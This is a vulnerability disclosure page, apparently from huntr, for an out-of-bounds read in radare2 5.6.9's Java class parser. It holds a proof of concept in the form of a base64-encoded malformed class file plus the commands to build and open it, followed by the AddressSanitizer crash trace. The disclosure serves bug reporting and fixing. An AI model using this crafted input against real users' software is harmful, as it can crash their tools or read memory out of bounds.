Lucene search
Bet4itC8F4C2DE-7D96-4AD4-857A-C099EFFCA2D6HistoryApr 23, 2022 - 3:09 p.m.
Out-of-bounds Read in r_bin_java_bootstrap_methods_attr_new function
2022-04-2315:09:28
bet4it
www.huntr.dev
13
7.1 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:N/A:P
0.001 Low
EPSS
Percentile
26.8%
- Description
Out-of-bounds (OOB) read vulnerability exists in r_bin_java_bootstrap_methods_attr_new function in Radare2 5.6.9.
This is similar with CVE-2022-0518 and CVE-2022-0521.
- Version
radare2 5.6.9 27745 @ linux-x86-64 git.conti
commit: 14189710859c27981adb4c2c2aed2863c1859ec5 build: 2022-04-23__11:05:49
- Proof of Concept
# build the radare2 with address sanitizer
./sys/sanitize.sh
echo yv66vgAAADQADQcACwcADAEADnZpcnR1YWxEYWNoaW5lAQAeKAdMY29tL3N1bi9qZGkvVmlydHVhbE1hY2hpbmU7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAAtNaXJyb3IuamF2YQEAEEJvb3RzdHJhcE1ldGhvZHMBABdGb3VuZF9ieV9naXRodWIvYmV0NGl0OwEAEmNv7S9zdW4vamRpL01pcnJvAQEAEGphdmEvbGFuZy9PYmplY3QGBQABAAIAAAAAAAIEAQADAAQAAAQBEgUABgAAAAIABwAAAAIACAAJAAAAAA== | base64 -d > bootstrap.class
ASAN_OPTIONS=detect_leaks=0:detect_odr_violation=0 r2 -A bootstrap.class
- ASAN
=================================================================
==608400==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000063cb7 at pc 0x7f5fffc53f0c bp 0x7fff215606c0 sp 0x7fff215606b0
READ of size 1 at 0x602000063cb7 thread T0
#0 0x7f5fffc53f0b in r_bin_java_bootstrap_methods_attr_new /src/radare2/shlr/java/class.c:6934
#1 0x7f5fffc04919 in r_bin_java_read_next_attr_from_buffer /src/radare2/shlr/java/class.c:2082
#2 0x7f5fffc041e5 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2043
#3 0x7f5fffc0816c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
#4 0x7f5fffc0a25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
#5 0x7f5fffc099f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
#6 0x7f5fffc16be8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
#7 0x7f5ff974a8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
#8 0x7f5ff9580989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
#9 0x7f5ff95751c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
#10 0x7f5ff95301ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
#11 0x7f5ff9531060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
#12 0x7f5ffba2dedd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
#13 0x7f5ffba30c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
#14 0x7f6004a2fc10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
#15 0x559df515e81b in main /src/radare2/binr/radare2/radare2.c:96
#16 0x7f6003e1a30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
#17 0x7f6003e1a3c0 in __libc_start_main@GLIBC_2.2.5 (/usr/lib/libc.so.6+0x2d3c0)
#18 0x559df515e1a4 in _start (/src/radare2/binr/radare2/radare2+0x21a4)
0x602000063cb7 is located 0 bytes to the right of 7-byte region [0x602000063cb0,0x602000063cb7)
allocated by thread T0 here:
#0 0x7f6005bb5fb9 in __interceptor_calloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x7f5fffc026a9 in r_bin_java_get_attr_buf /src/radare2/shlr/java/class.c:1963
#2 0x7f5fffc041a6 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2039
#3 0x7f5fffc0816c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
#4 0x7f5fffc0a25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
#5 0x7f5fffc099f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
#6 0x7f5fffc16be8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
#7 0x7f5ff974a8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
#8 0x7f5ff9580989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
#9 0x7f5ff95751c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
#10 0x7f5ff95301ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
#11 0x7f5ff9531060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
#12 0x7f5ffba2dedd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
#13 0x7f5ffba30c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
#14 0x7f6004a2fc10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
#15 0x559df515e81b in main /src/radare2/binr/radare2/radare2.c:96
#16 0x7f6003e1a30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/radare2/shlr/java/class.c:6934 in r_bin_java_bootstrap_methods_attr_new
Shadow bytes around the buggy address:
0x0c0480004740: fa fa fd fa fa fa fd fa fa fa 05 fa fa fa 00 07
0x0c0480004750: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 01
0x0c0480004760: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 03
0x0c0480004770: fa fa fd fd fa fa 05 fa fa fa 00 04 fa fa 05 fa
0x0c0480004780: fa fa 05 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa
=>0x0c0480004790: fa fa fd fd fa fa[07]fa fa fa fa fa fa fa fa fa
0x0c04800047a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==608400==ABORTING
Related
huntr
huntr
Out-of-bounds Read in r_bin_java_constant_value_attr_new function
2022-04-23 15:00:19
in radareorg/radare2
2022-01-22 14:40:31
Heap-based Buffer Overflow in radareorg/radare2
2022-01-23 03:04:38
prion
prion
Heap overflow
2022-02-08 21:15:00
Out-of-bounds
2022-04-24 21:15:00
Design/Logic Flaw
2022-02-08 21:15:00
cve
cve
osv
osv
ubuntucve
ubuntucve
debiancve
debiancve
veracode
veracode
Denial Of Service (DoS)
2022-12-26 00:42:21
Denial Of Service (DoS)
2022-02-09 04:05:59
Heap-based Buffer Overflow
2022-12-26 17:15:35
alpinelinux
alpinelinux
cnvd
cnvd
Radareorg Radare2 Buffer Overflow Vulnerability (CNVD-2022-13391)
2022-02-11 00:00:00
Radareorg Radare2 Buffer Overflow Vulnerability (CNVD-2022-13394)
2022-02-11 00:00:00
openvas
openvas
Fedora: Security Advisory for radare2 (FEDORA-2022-85b277e748)
2022-03-27 00:00:00
Fedora: Security Advisory for radare2 (FEDORA-2022-7db9e7bb5b)
2022-03-23 00:00:00
Mageia: Security Advisory (MGASA-2022-0440)
2022-11-28 00:00:00
fedora
fedora
[SECURITY] Fedora 35 Update: radare2-5.6.4-1.fc35
2022-03-11 14:47:54
[SECURITY] Fedora 36 Update: radare2-5.6.4-1.fc36
2022-03-26 15:39:36
mageia
mageia
Updated radare2/rizin packages fix security vulnerability
2022-11-27 23:51:49
7.1 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:N/A:P
0.001 Low
EPSS
Percentile
26.8%
Related for C8F4C2DE-7D96-4AD4-857A-C099EFFCA2D6